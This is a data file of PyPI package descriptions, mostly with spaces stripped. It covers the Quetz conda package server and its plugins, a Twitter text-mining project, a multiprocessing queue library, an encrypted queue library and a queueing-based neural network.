extensionsUsage:quetz-frontend[OPTIONS]COMMAND[ARGS]...\n\nOptions:--install-completionInstallcompletionforthecurrentshell.--show-completionShowcompletionforthecurrentshell,tocopyitorcustomizetheinstallation.--helpShowthismessageandexit.\n\nCommands:buildBuildanextensioncleanCleantheextensionsdirectoryclean-frontendCleantheQuetz-FrontenddevelopBuildandinstallanextensionindevmodeinstallBuildandinstallanextensionlink-frontendIntalltheQuetz-FrontendlistListofextensionspathswatchWatchanextension"} +{"package": "quetzpy", "pacakge-description": "Quetzalcoatl :snake: :bird: :eyeglasses:Understand how people are talking of a topic based on a simple queryQuetzalcoatl :snake: :bird: :eyeglasses:1. WHAT IS IT?2. WHAT'S INSIDE THIS REPO ?2.1 root folder2.2 src folder2.3 __config__ folder2.4 media folder3. HOW TO USE IT ?4. ABOUT THE PROJECT5. CONTACT THE AUTHOR6. CONTRIBUTE1. WHAT IS IT?The Queztzalcoatl project is the ability to:eyes: excavate the :bird: Twitter API to extract insights about any topic that people talk about.From a topic, you should be able to understand how people react using the power of text mining.:arrow_up:Go to top page2. 
WHAT'S INSIDE THIS REPO ?Quetzalcoatl\n\u251c\u2500\u2500 /__config__\n\u2502 \u251c\u2500\u2500 DEMO_configuration_extractor.json\n\u2502 \u2514\u2500\u2500 DEMO_configuration_runner.json\n\u251c\u2500\u2500 /media\n\u251c\u2500\u2500 /src\n\u2502 \u251c\u2500\u2500 /modules\n\u2502 \u2502 \u251c\u2500\u2500 data_cleaning.py \n\u2502 \u2502 \u251c\u2500\u2500 data_mining.py \n\u2502 \u2502 \u251c\u2500\u2500 data_stats.py \n\u2502 \u2502 \u251c\u2500\u2500 decorators.py \n\u2502 \u2502 \u2514\u2500\u2500 tweeter_connection.py \n\u2502 \u2514\u2500\u2500 Quetzalcoatl.py\n\u251c\u2500\u2500 requirements.txt\n\u251c\u2500\u2500 demo.py\n\u251c\u2500\u2500 .gitignore \n\u251c\u2500\u2500 README.md\n\u2514\u2500\u2500 LICENCE2.1 root folderYou will find:FileDescriptionrequirements.txtUsed by pip to install dependanciesdemo.pyA demo script.gitignore-README.md-LICENCE-2.2 src folderYou will find:FileDescription/src/modulesContains modules used by the project/src/modules/data_cleaning.pymodule used to clean the tweets/src/modules/data_mining.pymodule used to extract insights from each tweets/src/modules/data_stats.pymodule used to run some statistics from the mined data or tracked words/src/modules/decorators.pymodule that contains all the decorators/src/modules/tweeter_connection.pymodule used to connect to the Twitter API/src/Quetzalcoatl.pyContains all the classes of the project2.3 __config__ folderYou will find the two configuration files used by the demo script2.4 media folderAll the stuff that are used to produce documents:arrow_up:Go to top page3. HOW TO USE IT ?Want to try the project? Please, follow the instructions from the Wiki page!:arrow_up:Go to top page4. ABOUT THE PROJECTI started this project a long time ago as my very first Python project. At first, I used some webscraping with Selenium as I didn't know how to use an API. As my experience with Python grew, I switched to the Twitter REST API and bash scripting and started think automation. Now, I am willing to create a package, or even an API inside which it would be possible to track an information inside a topic.:arrow_up:Go to top page5. CONTACT THE AUTHORYou can reach me on Twitter {LINK}I am also on LinkedIn {LINK}6. CONTRIBUTEThe Quetzalcoatl is a open source project. 
As so, if you feel interested in building the project with me, it would be amazing!Feel free to contact me on Twitter so I can tell you how you can help.We also have an issue page,link here!:arrow_up:Go to top page"} +{"package": "quetz-server", "pacakge-description": "The Open-Source Server for Conda Packagespart of mamba-orgPackage ManagermambaPackage ServerquetzPackage BuilderboaQuetzThe quetz project is an open source server for conda packages.\nIt is built upon FastAPI with an API-first approach.\nA quetz server can have many users, channels and packages.\nWith quetz, fine-grained permissions on channel and package-name level will be possible.Quetz has an optional clientquetz-clientthat can be used to upload packages to a quetz server instance.UsageYou should havemambaor conda installed.GetQuetzsources:gitclonehttps://github.com/mamba-org/quetz.gitThen create an environment:cdquetz\nmambaenvcreate-fenvironment.yml\ncondaactivatequetz\nln-s\"${CONDA_PREFIX}\".venv# Necessary for pyright.InstallQuetz:Use the editable mode-eif you are developer and want to take advantage of thereloadoption ofQuetzpipinstall-e.Use the CLI to create aQuetzinstance:quetzruntest_quetz--copy-conf./dev_config.toml--dev--reloadLinks:http://localhost:8000/- Login with your github accounthttp://localhost:8000/api/dummylogin/alice- Login with test user, one of [alice | bob | carol | dave]http://localhost:8000/docs- Swagger UI for this REST serviceDownloadxtensoras test package:./download-test-package.shTo upload the package, install thequetz-client:mambainstallquetz-clientTo run the upload, you need to set environment variables for the quetz API key (which authenticates you) and the quetz server URL. As we passed the--devflag to quetz, a testing API key can be found in quetz's output which you can use for this example.exportQUETZ_API_KEY=E_KaBFstCKI9hTdPM7DQq56GglRHf2HW7tQtq6si370exportQUETZ_SERVER_URL=http://localhost:8000\nquetz-clientpost_file_to_channelchannel0xtensor/linux-64/xtensor-0.24.3-h924138e_1.tar.bz2\nquetz-clientpost_file_to_channelchannel0xtensor/osx-64/xtensor-0.24.3-h1b54a9f_1.tar.bz2\nquetz-clientpost_file_to_channelchannel0xtensor/osx-arm64/xtensor-0.24.3-hf86a087_1.tar.bz2Install the test package with conda:mambainstall--strict-channel-priority-chttp://localhost:8000/get/channel0-cconda-forgextensorOutput:...\n Package Version Build Channel Size\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 
Install:\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\n xtensor 0.16.1 0 http://localhost:8000/get/channel0/osx-64 109 KB\n xtl 0.4.16 h04f5b5a_1000 conda-forge/osx-64 47 KB\n\n Summary:\n\n Install: 2 packages\n\n Total download: 156 KB\n\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n...Browse channels:http://localhost:8000/get/channel0/S3 BackendTo enable the S3 backend, you will first require the s3fs library:mambainstall-cconda-forges3fsThen add your access and secret keys to thes3section with yourconfig.toml, like so:[s3]access_key=\"AKIAIOSFODNN7EXAMPLE\"secret_key=\"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\"url=\"https://...\"region=\"\"bucket_prefix=\"...\"bucket_suffix=\"...\"Be sure to set the url and region field if not using AWS.Channels are created with the following semantics:{bucket_prefix}{channel_name}{bucket_suffix}The s3 backend is currently designed for one bucket per channel. It may be possible to put all channels in one bucket, but that will require some code tweaksIf you're using IAM roles, don't setaccess_keyandsecret_keyor set them to empty strings\"\".Google OAuth 2.0 OpenID ConnectTo enable auth via Google, you will need to register an application at:https://console.developers.google.com/apis/credentialsThen add the client secret & ID to agooglesection of yourconfig.toml:[google]client_id=\"EXAMPLEID420127570681-6rbcgdj683l3odc3nqearn2dr3pnaisq.apps.googleusercontent.com\"client_secret=\"EXAMPLESECRETmD-7UXVCMZV3C7b-kZ9yf70\"PostgreSQLBy default, quetz will run with sqlite database, which works well for local tests and small local instances. However, if you plan to run quetz in production, we recommend to configure it with the PostgreSQL database. 
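Before following the docker-based setup in the next subsection, it can help to sanity-check the connection URL you intend to hand to quetz. The snippet below is a minimal sketch and not part of the quetz documentation: it assumes SQLAlchemy plus a PostgreSQL driver such as psycopg2 are installed, and it reuses the same postgresql:// URL format as the [sqlalchemy] configuration section shown further down.

```python
# Hedged sketch: verify that a candidate database_url is reachable before
# pointing quetz at it. Assumes SQLAlchemy + a PostgreSQL driver (psycopg2).
from sqlalchemy import create_engine, text

database_url = "postgresql://postgres:mysecretpassword@localhost:5432/quetz"
engine = create_engine(database_url)

with engine.connect() as connection:
    # A trivial query; if this succeeds, the credentials and host are fine.
    print(connection.execute(text("SELECT version()")).scalar())
```

If this raises an OperationalError, fix the credentials or host before touching the quetz configuration.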
There are several options to install PostgreSQL server on your local machine or production server, one of them being the official PostgreSQL docker image.Running PostgreSQL server with dockerYou can the PostgresSQL image from the docker hub and start the server with the commands:dockerpullpostgres\ndockerrun--namesome-postgres-p5432:5432-ePOSTGRES_PASSWORD=mysecretpassword-dpostgresThis will start the server with the userpostgresand the passwordmysecretpasswordthat will be listening for connection on the port 5432 of localhost.You can then create a database in PostgreSQL for quetz tables:sudo-upostgrespsql-hlocalhost-c'CREATE DATABASE quetz OWNER postgres;'Deploying Quetz with PostgreSQL backendThen in your configuration file (such asdev_config.toml) replace the[sqlalchemy]section with:[sqlalchemy]database_url=\"postgresql://postgres:mysecretpassword@localhost:5432/quetz\"Finally, you can create and run a new quetz deployment based on this configuration (we assume that you saved it in fileconfig_postgres.toml):quetzrunpostgres_quetz--copy-confconfig_postgres.tomlNote that this recipe will create an ephemeral PostgreSQL database and it will delete all data after thesome-postgrescontainer is stopped and removed. To make the data persistent, please check the documentation of thepostgresimageor your container orchestration system (Kubernetes or similar).Running tests with PostgreSQL backendTo run the tests with the PostgreSQL database instead of the default SQLite, follow the stepsaboveto start the PG server. Then create an new database:psql-Upostgres-hlocalhost-c'CREATE DATABASE test_quetz OWNER postgres;'You will be asked to type the password to the DB, which you defined when starting your PG server. In the docker-based instructions above, we set it tomysecretpassword.To run the tests with this database you need to configure theQUETZ_TEST_DATABASEenvironment variable:QUETZ_TEST_DATABASE=\"postgresql://postgres:mysecretpassword@localhost:5432/test_quetz\"pytest-v./quetz/testsFrontendQuetz comes with a initial frontend implementation. 
It can be found in quetz_frontend.\nTo build it, one needs to install:mambainstall'nodejs>=14'cdquetz_frontend\nnpminstall\nnpmrunbuild# for developmentnpmrunwatchThis will build the javascript files and place them in/quetz_frontend/dist/from where they are automatically picked up by the quetz server.Using quetzCreate a channelFirst, make sure you're logged in to the web app.Then, using the swagger docs at:/docs, POST to/api/channelswith the name and description of your new channel:{\"name\":\"my-channel\",\"description\":\"Description for my-channel\",\"private\":false}This will create a new channel calledmy-channeland your user will be the Owner of that channel.Generate an API keyAPI keys are scoped per channel, per user and optionally per package.\nIn order to generate an API key the following must be true:First, make sure you're logged in to the web app.The user must be part of the target channel (you might need to create a channel first, see the previous section on how to create a channel via the swagger docs)Go to the swagger docs at:/docsand POST to/api/api-keys:{\"description\":\"my-test-token\",\"roles\":[{\"role\":\"owner\",\"channel\":\"my-channel\"}]}Then, GET on/api/api-keysto retrieve your tokenFinally, set the QUETZ_API_KEY environment variable to this value so you can use quetz-client to interact with the server.Create a proxy channelA proxy channel \"mirrors\" another channel usually from a different server, so that the packages can be installed from the proxy as if they were installed directly from that server. All downloaded packages are cached locally and the cache is always up to date (there is no risk of serving stale packages). The reason to use the proxy channel is to limit traffic to the server of origin or to serve a channel that could be inaccessible from behind the corporate firewall.To create a proxy channel use the propertiesmirror_channel_url=URL_TO_SOURCE_CHANNELandmirror_mode='proxy'in the POST method of/api/channelsendpoint. For example, to proxy the channel namedbtelfrom anaconda cloud server, you might use the following request data:{\"name\":\"proxy-channel\",\"private\":false,\"mirror_channel_url\":\"https://conda.anaconda.org/btel\",\"mirror_mode\":\"proxy\"}You may copy the data directly to the Swagger web interface under the heading POST/api/channelsor use the cURL tool from command line. Assuming that you deployed a quetz server on port 8000 (the default) on your local machine, you could make the request with the following cURL command:exportQUETZ_API_KEY=...\ncurl-XPOST\"http://localhost:8000/api/channels\"\\-H\"accept: application/json\"\\-H\"Content-Type: application/json\"\\-H\"X-API-Key:${QUETZ_API_KEY}\"\\-d'{\"name\":\"proxy-channel\",\"private\":false,\"mirror_channel_url\":\"https://conda.anaconda.org/btel\",\"mirror_mode\":\"proxy\"}'where the value ofQUETZ_API_KEYvariable should be the API key that was printed when you created the quetz deployment or retrieved using the API as described in the sectionGenerate an API key.Then you can install packages from the channel the standard way usingcondaormamba:mambainstall--strict-channel-priority-chttp://localhost:8000/get/proxy-channelnrnpythonCreate a mirroring channelA mirror channel is an exact copy of another channel usually from a different (anaconda or quetz) server. The packages are downloaded from that server and added to the mirror channel. 
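As a hedged illustration only: the same POST /api/channels endpoint and X-API-Key header used in the cURL calls of this section can also be driven from Python with the requests package, for example to register the mirror channel whose JSON payload appears just below. The requests dependency and the localhost URL are assumptions here.

```python
# Hedged sketch: Python-requests equivalent of the cURL call shown below.
# Assumes the `requests` package, a quetz server on localhost:8000 and a
# valid API key in the QUETZ_API_KEY environment variable.
import os
import requests

payload = {
    "name": "mirror-channel",
    "private": False,
    "mirror_channel_url": "https://conda.anaconda.org/btel",
    "mirror_mode": "mirror",
}
response = requests.post(
    "http://localhost:8000/api/channels",
    json=payload,
    headers={"X-API-Key": os.environ["QUETZ_API_KEY"]},
)
response.raise_for_status()
```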
The mirror channel supports the standard Quetz API except requests that would add or modify the packages (POST/api/channels/{name}/files, for example). Mirror channels can be used to off load traffic from the primary server, or to create a channel clone on the company Intranet.Creating a mirror channel is similar to creating proxy channels except that you need to change the value ofmirror_modeattribute fromproxytomirror(and choose a more suitable channel name obviously):{\"name\":\"mirror-channel\",\"private\":false,\"mirror_channel_url\":\"https://conda.anaconda.org/btel\",\"mirror_mode\":\"mirror\"}or with cURL:exportQUETZ_API_KEY=...\ncurl-XPOST\"http://localhost:8000/api/channels\"\\-H\"accept: application/json\"\\-H\"Content-Type: application/json\"\\-H\"X-API-Key:${QUETZ_API_KEY}\"\\-d'{\"name\":\"mirror-channel\",\"private\":false,\"mirror_channel_url\":\"https://conda.anaconda.org/btel\",\"mirror_mode\":\"mirror\"}'Mirror channels are read only (you can not add or change packages in these channels), but otherwise they are fully functional Quetz channels and support all standard read (GET) operations. For example, you may list all packages using GET/api/channels/{channel_name}/packagesendpoint:curlhttp://localhost:8000/api/channels/mirror-channel/packagesIf packages are added or modified on the primary server from which they were pulled initially, they won't be updated automatically in the mirror channel. However, you can trigger such synchronisation manually using the PUT/api/channels/{channel_name}/actionsendpoint:curl-XPUTlocalhost:8000/api/channels/mirror-channel/actions\\-H\"X-API-Key:${QUETZ_API_KEY}\"\\-d'{\"action\": \"synchronize\"}'Only channel owners or maintainers are allowed to trigger synchronisation, therefore you have to provide a valid API key of a privileged user.PluginsQuetz offers plugins in the plugins folder of this repo as well as via standalone installs. The following plugins are currently available:PluginDescriptionquetz_conda_suggestGenerate.mapfiles forconda-suggestquetz_content_trustGenerate signed repodata filesquetz_current_repodataTrim the repodata to only include latest package versionsquetz_dictauthenticatorDemo for creating new authenticatorsquetz_harvesterExtract additional metadata from packages using thelibcflibharvesterquetz_mamba_solveExport a specific set of package versions for reproducibilityquetz_repodata_patchingRepodata patchingquetz_repodata_zchunkServe repodata usingzchunkquetz_runexportsExtract and exposerun_exportsfrom package filesquetz_sql_authenticatorAn authenticator that stores credentials in the Quetz SQL database using passlib.quetz_tosEnforce signing the terms of service for Quetz usersquetz_transmutationConvert packages to .conda formatLicenseWe use a shared copyright model that enables all contributors to maintain the copyright on their contributions.This software is licensed under the BSD-3-Clause license. See theLICENSEfile for details."} +{"package": "quetz-sql-authenticator", "pacakge-description": "SQL AuthenticatorAn authenticator that stores credentials in the Quetz SQL database using passlib. It ships with REST routes for CRUD operations on the credentials table.InstallationLocally after cloning:pip install -e .Once uploaded to conda-forge:mamba install -c conda-forge quetz-sql-authenticatorUsageThe authenticator should be active now. 
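A hedged sketch of exercising the CRUD routes listed a little further below from Python; the localhost URL, the requests dependency and the API-key header are assumptions made for illustration, not something this description states.

```python
# Hedged sketch: create a credential and verify it exists via the CRUD
# routes documented below. URL, API-key header and `requests` are assumptions.
import requests

BASE = "http://localhost:8000"
HEADERS = {"X-API-Key": "..."}  # an owner/maintainer key, left elided here

r = requests.post(f"{BASE}/api/sqlauth/credentials/alice",
                  params={"password": "s3cret"}, headers=HEADERS)
r.raise_for_status()

r = requests.get(f"{BASE}/api/sqlauth/credentials/alice", headers=HEADERS)
print(r.status_code)  # 200 means the user now exists
```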
You can login by navigating to/auth/sql/login.CRUD operationsThe authenticator provides REST routes to create, update, and delete credentials and to reset the entire table.GET /api/sqlauth/credentials/: List all users.GET /api/sqlauth/credentials/{username}: Verify that a user exists.POST /api/sqlauth/credentials/{username}?password={password}: Create a new user.PUT /api/sqlauth/credentials/{username}?password={password}: Update a user's password.DELETE /api/sqlauth/credentials/{username}: Delete a user."} +{"package": "quetz-theme", "pacakge-description": "quetz-themeA dark-yellow theme for Quetz.RequirementsJupyterLab >= 3.0Installpipinstallquetz-themeContributingDevelopment installNote: You will need NodeJS to build the extension package.Thejlpmcommand is JupyterLab's pinned version ofyarnthat is installed with JupyterLab. You may useyarnornpmin lieu ofjlpmbelow.# Clone the repo to your local environment# Change directory to the quetz-theme directory# Install package in development modepipinstall-e.# Link your development version of the extension with JupyterLabjupyterlabextensiondevelop.--overwrite# Rebuild extension Typescript source after making changesjlpmrunbuildYou can watch the source directory and run JupyterLab at the same time in different terminals to watch for changes in the extension's source and automatically rebuild the extension.# Watch the source directory in one terminal, automatically rebuilding when neededjlpmrunwatch# Run JupyterLab in another terminaljupyterlabWith the watch command running, every saved change will immediately be built locally and available in your running JupyterLab. Refresh JupyterLab to load the change in your browser (you may need to wait several seconds for the extension to be rebuilt).By default, thejlpm run buildcommand generates the source maps for this extension to make it easier to debug using the browser dev tools. To also generate source maps for the JupyterLab core extensions, you can run the following command:jupyterlabbuild--minimize=FalseUninstallpipuninstallquetz-theme\njupyterlabextensionuninstallquetz-theme"} +{"package": "queue-automator", "pacakge-description": "QueueAutomatorA Python library that wraps the multiprocessing package. It provides a simple to use API to build queue-based multiprocessing pipelines.instalationRunpip install queue-automator(use python >=3.6 )SummaryQueueAutomator provides a clean decorator API to get started with multiprocessing and queues.This library offers an easy interface to parallelize consecutive tasks that take a long time to finish.As it is build on top of the native python-multiprocessing library, you can run compute intensive tasks without locking the main processAll the code that manages queues, spawning and joining processes is already implemented, so you can focus on the task at hand.How it works:ExampleUsing only 1 worker functionfromqueue_automatorimportQueueAutomatorfromtimeimportsleep# Create an instance of QueueAutomator()automator=QueueAutomator()# Register a worker function (if input_queue_name and output_queue_name are not provided# they will default to 'input' and 'output' respectively). 
'input' and 'output'# are necessary to mark the start and ending of your pipeline@automator.register_as_worker_function(process_count=2)defdo_work(item:int)->int:sleep(2)result=item*2print(f'{item}times two{result}')returnresultif__name__=='__main__':input_data=range(30)# Always set your input data before calling .run()automator.set_input_data(input_data)results=automator.run()print(results)Using more than 1 worker functionfromqueue_automatorimportQueueAutomatorfromtimeimportsleepautomator=QueueAutomator()@automator.register_as_worker_function(output_queue_name='square_queue',process_count=2)defdo_work(item:int)->int:sleep(2)result=item*2print(f'{item}times two{result}')returnresult@automator.register_as_worker_function(input_queue_name='square_queue',output_queue_name='cube_queue',process_count=2)defdo_work_2(item:int)->int:sleep(2)result=item**2print(f'{item}squared{result}')returnresult@automator.register_as_worker_function(input_queue_name='cube_queue',process_count=2)defdo_work_3(item:int)->int:sleep(2)result=item**3print(f'{item}cubed{result}')returnresult# Note that the first and last functions in the pipeline do not need to# declare the input and output queue names respectively.if__name__=='__main__':input_data=range(30)# Always set your input data before calling .run()automator.set_input_data(input_data)results=automator.run()print(results)Using the MultiprocessingMaybe interfacefromqueue_automator.maybeimportMultiprocessMaybedefdo_work(item:int)->int:sleep(2)result=item*2print(f'{item}times two{result}')returnresultdefdo_work_2(item:int)->int:sleep(2)result=item**2print(f'{item}squared{result}')returnresultdefdo_work_3(item:int)->int:sleep(2)result=item**3print(f'{item}cubed{result}')returnresultif__name__=='__main__':result=MultiprocessMaybe()\\.insert(range(10))\\.then(do_work)\\.insert(range(10,20))\\.then(do_work_2)\\.insert(range(20,30))\\.maybe(do_work_3,default=0)print(result)CautionsAs with anything, this is not a silver bullet that gets rid of all problems using python multiprocessingThere are some caveats when using this library:Launching processes in python is an expensive operation, as it spawns a separate instance of the interpreter. The performance gains could be offset by the time it takes to spawn a processTry to keep the number of processes in line with your CPU cores, spawning a ton of them could result in slower performance overall.The input objects of every worker function need to be serializable or pickable. This is a limitation of python multiprocessing. If you are dealing with complex objects try to convert them to a suitable format before processing, or implement the__reduce__,__repr__or__dict__methods in your classes.It is important that you try to keep your worker functions pure, which means that they should not have side effects.The.run()method should be called from your main entry point or a function that is called at your main entry point, (this is another limitation of python's multiprocessing)Try to optimize the number of process depending of how long a task takes, prioritize longer running tasks."} +{"package": "queue_bqsr_status", "pacakge-description": "No description available on PyPI."} +{"package": "queue-broker-client", "pacakge-description": "No description available on PyPI."} +{"package": "queue-bytes-io", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "queue-client", "pacakge-description": "No description available on PyPI."} +{"package": "queue_coclean_status", "pacakge-description": "No description available on PyPI."} +{"package": "queueCrypt", "pacakge-description": "queueCrypt.\"queueCrypt\" is a library that is library that creates a queue and secures it better.\nBasically this library encrypts the data that is been added to the queue and saves the data\nsecurely and safely.Libraries Needed:pip install cryptographythis library is needed to encrypt the data. Without this\nlibrary the library won't work!How To Call The Library?fromqueueCryptimportQueueTo Call The Errors Exceptions Use:fromqueueCryptimportErrorQueueSizeNotValid,ErrorRequestedHigherThanExpected#----OR----#fromqueueCrypt.errorsimport*To Call The Encryption Handler Use:fromqueueCrypt.extimportEncryption#----OR----#fromqueueCrypt.extimport*First Thing That Needed Before Using...fromqueueCryptimport*q=Queue(5)#----OR----#q=Queue()Every time that you create the Queue function you can setQueue(number)or useQueue()which will leave the queue with no limit. By setting a number,\nyou set the queue length, that can be changed if you need by usingq.change_queue_length(number).Examples:Let's create a secret input from the user that takes passwords\nand encrypts them. The user will type the passwords until he will type\"quit\". After adding them\nto the queue, print the encrypted list, and the decrypted list.fromqueueCryptimport*q=Queue()whileTrue:user=input(\"Type passwords: \")ifuser==\"quit\":break# When putting the user data you need to convert it to bytes!q.put(bytes(user,'utf8'))# returns in bytes form.print(q.get_queue_encrypted())print(q.get_queue_decrypted())Now let's say that you want to encrypt the data again\nbut after printing the inputted data, you return the encrypted data and delete it.fromqueueCryptimport*q=Queue()whileTrue:user=input(\"Type passwords: \")ifuser==\"quit\":break# When putting the user data you need to convert it to bytes!q.put(bytes(user,'utf8'))print(q.get_queue_encrypted()[0].decode())# destroys the first element in the queue list with timeout of 0.1.q.next_and_destroy(0.1)"} +{"package": "queued", "pacakge-description": "No description available on PyPI."} +{"package": "queued_search", "pacakge-description": "UNKNOWN"} +{"package": "queue_engine", "pacakge-description": "What is engine?engine is a collection of tools for processing a queue. It provides an API to\ndefer a callable and run it later. engine also provides process helpers to\nset up a safe environment for clearing different kind of queues.How to use engine?The basic usage of engine is to defer something to execute later. However, the\ninternals are written in such way to allow for planning. You can plan your\ncode to use a queue, but a queue doesn\u2019t even need to be present. Lets take a\nlook at an example:>>> import engine\n>>> def hello_world():\n... print \"hello world\"\n\n>>> engine.defer(hello_world)\nhello worldAs you can see above, the functionhello_worldwas executed immediately.\nThis is because, by default, engine will use theDummyQueuewhich will\nexecute the given callable when put on the queue.If you have a queue such as stompserver, ActiveMQ or any STOMP compliant\nqueue you can useStompQueue. Lets take a look at an example:>>> import engine\n>>> def hello_world():\n... 
print \"hello world\"\n\n>>> engine.defer(hello_world, queue=engine.StompQueue())The above code will now defer the call tohello_worldby sending it to the\nqueue.You can define the default queue used by engine. To do this you should useengine.configure. Here is an example changing the default queue fromDummyQueuetoStompQueue:>>> import engine\n>>> engine.configure(queue=engine.StompQueue())Now all calls toengine.deferwill use theStompQueueinstance."} +{"package": "queue-fetcher", "pacakge-description": "No description available on PyPI."} +{"package": "queue-front", "pacakge-description": "Queue FrontA lowest-common-denominator API for interacting with lightweight queues.\nA fork ofhttps://code.google.com/p/queues/. This main reason for this\nfork was to add python 3.0+ compatibility. Although you should be aware\nthat the backend libraries may not be python 3.0+ compatible.BackendsAmazon sqsboto, MITmemcached*pylibmc, 3-clause BSD\n(a python wrapper aroundTangentOrg\u2018slibmemcachedlibrary.)bmemcached,\nMIT (a pure python module)beanstalkdbeanstalkc,\nAPL-2.0redisredis-py, MIT*memcached backends must use a queueing server such as MemcacheQ.Example$ export QUEUE_BACKEND=redisd\n$ export QUEUE_REDIS_CONNECTION=localhost:6379\n$ python\n>>> from queue_front import queues\n>>> q = queues.Queue('myname')\n>>> q.write('test')\nTrue\n>>> len(q)\n1\n>>> q.read()\ntest\n>>> queues.get_list()\n['myname']AdvancedPackages SecurityThis module, when packaged, is signed with the following key:Mario Rosa\u2019s Key with id 0x8EBBFA6F (full fingerprint F261 96E4 8EF2\nED4A 26F8 58E9 04AA 48D1 8EBB FA6F) and his email ismario@dwaiter.comYou can find this key on servers likepgp.mit.edu."} +{"package": "queue-helpers", "pacakge-description": "queue_helpersThis package is a helper that is used to manage queues in RabbitMQ.Installingpipinstallqueue_helpersUsage>>>fromqueue_helpersimportRpcClient>>>defsend_rpc_message(queue_name,request,rabbit_username,rabbit_password,rabbitserver,vhost):...client=RpcClient(rabbit_server_host=rabbitserver,...virtual_host=vhost,...server_queue_name=queue_name,...username=rabbit_username,...password=rabbit_password)...resp=client.call(json.dumps(request))...response=json.loads(resp.decode(\"utf-8\"))...returnresponse"} +{"package": "queue_hlatype_status", "pacakge-description": "No description available on PyPI."} +{"package": "queueing_network_system_simpy", "pacakge-description": "UNKNOWN"} +{"package": "queueing-rnn", "pacakge-description": "Queueing Recurrent Neural Network (Q-RNN)Queueing Recurrent Neural Network (Q-RNN)is a new kind of Artificial Neural Network that has been designed to use in time-series forecasting applications. According to experiments that have been run, QRNN has a potential to outperform the LSTM, Simple RNN and GRU, in the cases where the dataset has highly non-linear characteristics.Table of contentsWhat is Q-RNN?ComparisonInstallationUsageLicenseWhat is Q-RNN? \ud83e\udd14(Look of a Random Neuron [4])It is a compose ofSimple RNNandRandom Neural Network. Queueing RNN uses the fundamental math of Queueing Theory and G-Queues while combining it with the powerful architecture of Recurrent Neural Networks. For more detailed explanation about the theoretical background of QRNN check themathematical-modelfolder and references section.Comparison \ud83d\udccaIn order to evaluate the performance of QRNN, it has been compared with LSTM, GRU and Simple RNN using Keras with TensorFlow backend. 
During the experiments, 4 different data sets (google stock price,bike sharing,pm2.5 concentration,traffic volume) and 10 different optimization algorithms have been used. The mean square error distribution on the test set is given in the image below. As it seems QRNN manages to reach 3 lowest rms error out of 4.Check thetest_resultsfolder to see detailed results \ud83d\udd0e.Installation \ud83d\udee0Installing viapippackage manager:pipinstallqueueing-rnnInstalling via GitHub:gitclonehttps://github.com/bilkosem/queueing-rnncdqueueing-rnn\npythonsetup.pyinstallUsage \ud83d\udc69\u200d\ud83d\udcbbfromqueueing_rnnimportQRNNdata=data.reshape((samples,timesteps,features))qrnn=QRNN([features,hiddenneurons,outputneurons])# Shape of the networkforsinrange(samples):qrnn.feedforward()# Calculate Lossqrnn.backpropagation()Check theexamplesfolder to see detailed use \ud83d\udd0e.References \ud83d\udcda[1]Gelenbe, Erol. (1989). Random Neural Networks with Negative and Positive Signals and Product Form Solution. Neural Computation - NECO. 1. 502-510. 10.1162/neco.1989.1.4.502.[2]Gelenbe, Erol. (1993). Learning in the Recurrent Random Neural Network. Neural Computation. 5. 154-164. 10.1162/neco.1993.5.1.154.[3]Basterrech, S., & Rubino, G. (2015). Random Neural Network Model for Supervised Learning Problems. Neural Network World, 25, 457-499.[4]Hossam Abdelbaki (2020). rnnsimv2.zip (https://www.mathworks.com/matlabcentral/fileexchange/91-rnnsimv2-zip), MATLAB Central File Exchange. Retrieved September 22, 2020.License"} +{"package": "queueing-systems", "pacakge-description": "queueing_systemsPython Package for Queueing System Parameter Estimation using Queueing TheoryThis Python package is designed to assist with estimating parameters in queueing systems using queueing theory. It provides a set of tools and algorithms to analyze and model queueing systems, allowing users to estimate various parameters such as arrival rates, service rates, queue lengths, and waiting times. With this package, users can leverage the power of queueing theory to optimize and improve the performance of their systems."} +{"package": "queueing-tool", "pacakge-description": "Queueing-tool is a package for simulating and analyzing networks. It is an\nevent based simulator that usesqueuesto simulate congestion\nand waiting on the network that includes tools for\nvisualizing network dynamics.DocumentationThe package documentation can be found 